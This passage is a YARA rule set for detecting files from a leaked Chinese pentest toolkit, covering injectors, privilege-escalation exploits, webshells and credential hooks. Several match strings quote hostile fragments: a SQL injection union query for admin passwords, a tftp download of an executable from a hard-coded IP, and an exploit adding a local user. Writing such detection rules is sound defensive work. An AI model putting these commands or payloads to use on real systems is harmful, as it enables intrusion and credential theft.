2489 lines
101 KiB
Text
2489 lines
101 KiB
Text
|
/*
|
||
|
Yara Rule Set
|
||
|
Author: Florian Roth
|
||
|
Date: 2015-06-23
|
||
|
Identifier: CN-PentestSet
|
||
|
*/
|
||
|
|
||
|
/* Rule Set ----------------------------------------------------------------- */
|
||
|
|
||
|
rule CN_Honker_MAC_IPMAC {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
|
||
|
id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
|
||
|
strings:
|
||
|
$s1 = "Http://Www.YrYz.Net" fullword wide
|
||
|
$s2 = "IpMac.txt" fullword ascii
|
||
|
$s3 = "192.168.0.1" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 267KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GetSyskey {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
|
||
|
id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
|
||
|
strings:
|
||
|
$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 40KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Churrasco {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
|
||
|
id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
|
||
|
strings:
|
||
|
$s0 = "HEAD9 /" ascii
|
||
|
$s1 = "logic_er" fullword ascii
|
||
|
$s6 = "proggam" fullword ascii
|
||
|
$s16 = "DtcGetTransactionManagerExA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 12 times */
|
||
|
$s17 = "GetUserNameA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 305 times */
|
||
|
$s18 = "OLEAUT" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1276KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_mysql_injectV1_1_Creak {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "a1f066789f48a76023598c5777752c15f91b76b0"
|
||
|
id = "39025a57-557a-53c0-bfdb-81fe83f824af"
|
||
|
strings:
|
||
|
$s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s12 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 5890KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ASP_wshell {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
|
||
|
id = "028136cd-129b-5d58-a4c2-ba730a798c06"
|
||
|
strings:
|
||
|
$s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "UserPass="
|
||
|
$s2 = "VerName="
|
||
|
$s3 = "StateName="
|
||
|
condition:
|
||
|
uint16(0) == 0x253c and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_exp_iis7 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
|
||
|
id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
|
||
|
strings:
|
||
|
$s0 = "\\\\localhost" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "iis.run" fullword ascii
|
||
|
$s3 = ">Could not connecto %s" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "WinSta0\\Default" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 22 times */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 60KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SegmentWeapon {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
|
||
|
id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
|
||
|
strings:
|
||
|
$s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Alien_iispwd {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
|
||
|
id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
|
||
|
strings:
|
||
|
$s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
filesize < 3KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Md5CrackTools {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
|
||
|
id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
|
||
|
strings:
|
||
|
$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
|
||
|
$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 4580KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_CoolScan_scan {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file scan.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
|
||
|
id = "781446d2-3363-56c3-9767-c7ac70047b68"
|
||
|
strings:
|
||
|
$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "scan web.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3680KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_mempodipper2_6 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "ba2c79911fe48660898039591e1742b3f1a9e923"
|
||
|
id = "43a27968-adab-5f27-9b8c-8f0f895f0576"
|
||
|
strings:
|
||
|
$s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
filesize < 30KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_COOKIE_CooKie {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
|
||
|
id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
|
||
|
strings:
|
||
|
$s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "CooKie.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 360KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_wwwscan_1_wwwscan {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "6bed45629c5e54986f2d27cbfc53464108911026"
|
||
|
id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
|
||
|
strings:
|
||
|
$s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 180KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_D_injection_V2_32 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
|
||
|
id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
|
||
|
strings:
|
||
|
$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
|
||
|
$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 5000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_net_priv_esc2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
|
||
|
id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
|
||
|
strings:
|
||
|
$s1 = "Usage:%s username password" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "<www.darkst.com>" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 17KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Oracle_v1_0_Oracle {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
|
||
|
id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
|
||
|
strings:
|
||
|
$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "OnGetPassword" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3455KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Interception {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
|
||
|
id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
|
||
|
strings:
|
||
|
$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "WinlogonHackEx " fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 160KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_3_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
|
||
|
id = "994ad7e9-2019-54b3-84e6-2762a700c939"
|
||
|
strings:
|
||
|
$s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s9 = "CryptGenRandom" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 581 times */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 395KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_windows_exp {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file exp.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "04334c396b165db6e18e9b76094991d681e6c993"
|
||
|
id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
|
||
|
strings:
|
||
|
$s0 = "c:\\windows\\system32\\command.com /c " fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s8 = "OH,Sry.Too long command." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 220KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_safe3wvs_cgiscan {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
|
||
|
id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
|
||
|
strings:
|
||
|
$s2 = "httpclient.exe" fullword wide
|
||
|
$s3 = "www.safe3.com.cn" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 357KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_pr_debug {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file debug.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
|
||
|
id = "6d759818-b762-56f4-8475-82a7d18a659c"
|
||
|
strings:
|
||
|
$s1 = "-->Got WMI process Pid: %d " ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 820KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_Lpk_Sethc_v4_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
|
||
|
id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
|
||
|
strings:
|
||
|
$s0 = "LOADER ERROR" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s15 = "2011-2012 T00LS&RICES" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2077KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_MatriXay1073 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2023-01-27"
|
||
|
score = 70
|
||
|
hash = "fef951e47524f827c7698f4508ba9551359578a5"
|
||
|
id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
|
||
|
strings:
|
||
|
$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "getalluserpasswordhash" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 9100KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Sword1_5 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
|
||
|
id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
|
||
|
strings:
|
||
|
$s1 = "http://www.md5.com.cn" fullword wide
|
||
|
$s2 = "ListBox_Command" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\Set.ini" wide
|
||
|
$s4 = "OpenFileDialog1" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 740KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Havij_Havij {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
|
||
|
id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
|
||
|
strings:
|
||
|
$s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_exp_ms11011 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
|
||
|
id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
|
||
|
strings:
|
||
|
$s0 = "\\i386\\Hello.pdb" ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "OS not supported." fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = ".Rich5" fullword ascii
|
||
|
$s3 = "Not supported." fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 3 times */
|
||
|
$s5 = "cmd.exe" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 120 times */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
|
||
|
id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
|
||
|
strings:
|
||
|
$s0 = "PassMinDll.dll" fullword ascii
|
||
|
$s1 = "\\ws2help.dll" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 30KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Webshell {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
|
||
|
id = "12870766-2b85-522d-9ad8-abba2786caaf"
|
||
|
strings:
|
||
|
$s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Do you want to cancel the file download?" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Downloading: %s" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 381KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_AspxClient {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2022-12-21"
|
||
|
score = 70
|
||
|
hash = "67569a89128f503a459eab3daa2032261507f2d2"
|
||
|
id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
|
||
|
strings:
|
||
|
$s1 = "\\tools\\hashq\\hashq.exe" wide
|
||
|
$s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
|
||
|
$s3 = "\\myshell.mdb" wide /* PEStudio Blacklist: strings */
|
||
|
$s4 = "injectfile" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1000KB and 3 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Fckeditor {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "4b16ae12c204f64265acef872526b27111b68820"
|
||
|
id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
|
||
|
strings:
|
||
|
$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1340KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Codeeer_Explorer {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
|
||
|
id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
|
||
|
strings:
|
||
|
$s2 = "Codeeer Explorer.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s12 = "webBrowser1_ProgressChanged" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 470KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SwordHonkerEdition {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
